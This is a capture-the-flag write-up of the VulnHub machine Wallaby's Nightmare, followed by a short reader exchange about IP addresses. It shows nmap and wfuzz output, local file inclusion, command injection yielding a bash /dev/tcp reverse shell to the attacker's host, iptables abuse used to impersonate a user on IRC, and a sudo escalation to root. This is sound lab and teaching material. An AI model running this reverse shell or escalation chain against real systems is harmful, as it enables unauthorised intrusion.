Wallaby's: Nightmare
Location
https://download.vulnhub.com/wallabys/wallabysnightmare.rar
Introduction
Level: beginner-intermediate
This is the first boot2root machine created by Waldo.
It’s the first part in a two part series. The creator was inspired by many VM’s from vulnhub.com and made this with different attack vectors. The machine will respond on how the ‘intruder’ tries to get in. Make a wrong move and some stuff gets moved around and makes the machine more difficult!
It was created for educational purposes and so people can have a little fun testing their skills in a legal, pentest lab environment.
Scenario: The intruder is breaking into a fictional characters server (named Wallaby) and tries to gain root without him noticing, or else the difficulty level will increase if you make the wrong move!
Getting Started
First I run a nmap scan to discover any open ports.
┌─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -sV -p- 192.168.171.4 Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-30 13:37 CET Nmap scan report for 192.168.171.4 Host is up (0.00054s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA) |_ 256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Wallaby's Server 6667/tcp filtered irc Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds
My first stop is the SSH server for some banner grabbing.
┌─[n13mant@planetmars]─[~] └──╼ $ssh 192.168.171.4 -p 22 The authenticity of host '192.168.171.4 (192.168.171.4)' can't be established. ECDSA key fingerprint is SHA256:nRDXRBPtapHeG1jqIbacovukdKPIveFVy1GE8kntdU4. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.171.4' (ECDSA) to the list of known hosts. n13mant@192.168.171.4's password:
No useful banner here. Onward to the webserver.
Things are getting serious!
In the URL they made use of a parameter. When I change the parameter I get access to ‘/etc/passwd’.
Looks like there are two users: “walfin” and “steven?”.
Looks like this vector is gone. After another nmap scan it seems that port 80 is closed and another port has opened which runs the webserver.
┌─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -sV -p- 192.168.171.4 Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-30 14:04 CET Nmap scan report for 192.168.171.4 Host is up (0.00094s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA) |_ 256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA) 6667/tcp filtered irc 60080/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Wallaby's Server Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds
Let’s see if the previous vulnerability is still active.
Looks like the LFI vulnerability still exists. Or so I thought.
Guess I’m being trolled here. Time for finding a new vector.
Because dirb wasn’t getting me anywhere I tried Wfuzz.
┌─[n13mant@planetmars]─[~/Desktop] └──╼ $wfuzz -c -z file,/usr/share/wordlists/openwordlist/language/english/lower.lst --hc 404 --hw 87 http://192.168.171.4:60080/?page=FUZZ ******************************************************** * Wfuzz 2.1.3 - The Web Bruteforcer * ******************************************************** Target: http://192.168.171.4:60080/?page=FUZZ Total requests: 390532 ================================================================== ID Response Lines Word Chars Request ================================================================== 37084: C=200 27 L 106 W 994 Ch "blacklist" ..." 69281: C=200 26 L 86 W 895 Ch "contact" ..." 147277: C=200 30 L 115 W 1147 Ch "home" ..." 158165: C=200 38 L 150 W 1362 Ch "index" ..." 186261: C=200 29 L 102 W 1085 Ch "mailer" -----SNIP-----
After checking some pages I got to the last one on my list which was the most promising one.
<!--a href='/?page=mailer&mail=mail wallaby "message goes here"'><button type='button'>Sendmail</button-->
<!--Better finish implementing this so N13manT
can send me all his loser complaints!-->
The parameter, commented in the source code, was vulnerable to arbitrary code execution.
Because it will be much easier to recon the system with a shell, I use a bash command to create a reverse shell.
bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"
Which I need to URL encode.
┌─[n13mant@planetmars]─[~] └──╼ $nc -lvnp 31337 listening on [any] 31337 ... connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 37744 bash: cannot set terminal process group (1074): Inappropriate ioctl for device bash: no job control in this shell www-data@ubuntu:/var/www/html$
www-data@ubuntu:/var/www/html$ ls -lah /home ls -lah /home total 20K drwxr-xr-x 5 root root 4.0K Dec 16 15:44 . drwxr-xr-x 22 root root 4.0K Dec 14 19:24 .. drwxr-xr-x 5 ircd ircd 4.0K Dec 16 15:28 ircd drwxr-xr-x 5 waldo waldo 4.0K Dec 16 16:51 waldo drwxr-xr-x 8 wallaby wallaby 4.0K Dec 16 16:02 wallaby
Look like there are 2 users and a IRC-bot.
www-data@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
(ALL) NOPASSWD: /sbin/iptables
It seems I have some sudo rights. For instance, I can change the firewall rules.
www-data@ubuntu:/$ sudo iptables -S sudo iptables -S -P INPUT ACCEPT -P FORWARD ACCEPT -P OUTPUT ACCEPT -A INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT -A INPUT -p tcp -m tcp --dport 6667 -j DROP
There is a rule that drops packets on port 6667. When I check my notes I see that there is a filtered port 6667 in my nmap scan 6667/tcp filtered irc.
www-data@ubuntu:/$ netstat -anp | grep "LISTEN" netstat -anp | grep "LISTEN" (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::60080 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN -
After checking the networking it seems there is running an IRC local.
www-data@ubuntu:/$ dpkg -l dpkg -l Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version Architecture Description +++-==============-============-============-================================= -----SNIP----- ii irssi 0.8.19-1ubun amd64 terminal based IRC client -----SNIP-----
www-data@ubuntu:/home/waldo$ ./irssi.sh ./irssi.sh no server running on /tmp/tmux-33/default
At first I tried to use a IRC client on the remote machine, but that didn’t work. So because I can alter the firewall rules I can try to flush the iptable and connect with the IRC port from my own machine.
After a few tries I get a channel with an user Waldo and a bot.
With IRC there is an option to show the list of custom commands, because /help was an option for HexChat itself. The option is .help.
Oh oh……busted! So it knows I’m not Waldo. I need to get Waldo out of the chatroom and replace myself with the waldo username. But how? I’ve tried the kick/ban options on this side. Didn’t work. So I need to deny its access from the other side……back to the firewall rules.
www-data@ubuntu:/home/wallaby$ id waldo id waldo uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
To set the correct rule I checkout a site which provides me with the answer I was seeking.
www-data@ubuntu:/home/wallaby$ sudo iptables -I OUTPUT -m owner --uid-owner 1000 -p tcp --dport 6667 -j DROP <T -m owner --uid-owner 1000 -p tcp --dport 6667 -j DROP www-data@ubuntu:/home/wallaby$ sudo iptables -L sudo iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination DROP tcp -- anywhere anywhere owner UID match waldo tcp dpt:ircd
After a while waldo is gone……..the king is dead, long live the king!
With the /nick command I change my nickname to ‘waldo’ and assume his place.
Time for another reverse shell. I use the same as before, but this time change the portnumber to 1337.
┌─[n13mant@planetmars]─[~] └──╼ $nc -lvnp 1337 listening on [any] 1337 ... connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 60128 bash: cannot set terminal process group (699): Inappropriate ioctl for device bash: no job control in this shell wallaby@ubuntu:~$ id id uid=1001(wallaby) gid=1001(wallaby) groups=1001(wallaby),4(adm) wallaby@ubuntu:~$
After this it was easy obtaining root.
wallaby@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for wallaby on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wallaby may run the following commands on ubuntu:
(ALL) NOPASSWD: ALL
wallaby@ubuntu:~$ sudo su -
sudo su -
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# cd /root cd /root root@ubuntu:~# ls -lah ls -lah total 48K drwx------ 4 root root 4.0K Dec 27 19:31 . drwxr-xr-x 22 root root 4.0K Dec 14 19:24 .. drwxr-xr-x 2 root root 4.0K Dec 27 11:27 backups -rw------- 1 root root 1 Dec 27 12:26 .bash_history -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc -rwxr-xr-x 1 root root 510 Dec 27 19:31 check_level.sh -rw-r--r-- 1 root root 342 Dec 16 16:52 flag.txt -rw------- 1 root root 18 Dec 15 13:03 .mysql_history drwxr-xr-x 2 root root 4.0K Dec 15 13:10 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 66 Dec 15 17:50 .selected_editor -rw-r--r-- 1 root root 214 Dec 16 17:09 .wget-hsts root@ubuntu:~# cat flag.txt cat flag.txt ###CONGRATULATIONS### You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!! This was my first vulnerable machine/CTF ever! I hope you guys enjoyed playing it as much as I enjoyed making it! Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it. Thanks guys! -Waldo
Conclusion
This challenge was fun to do. The difficulty level didn’t change that much and after the first moment of being “caught” there wasn’t really a game changer. The machine did feel a bit “buggy” when I was trying to execute an arbitrary command and the system didn’t responded. After a reset of the machine and following the exact same steps I was able to get a better and smoother experience.
Thanks Waldo for making this VM. Hope to see more of your work in the near future.
I have doubt in the IP you start to Nmap!
How you got this IP Address 192.168.171.4
Sorry, I’m totally new to this field, please help
Hi Yash,
192.168.171.4 was assigned by the dhcp server.
This is not an external IP address. So if you try to scan the same IP, you won’t get any good result.
When you run the image on your VMware or Vbox it will get its own IP address. You can set the IP range yourself in the settings of your VM software.
Good luck.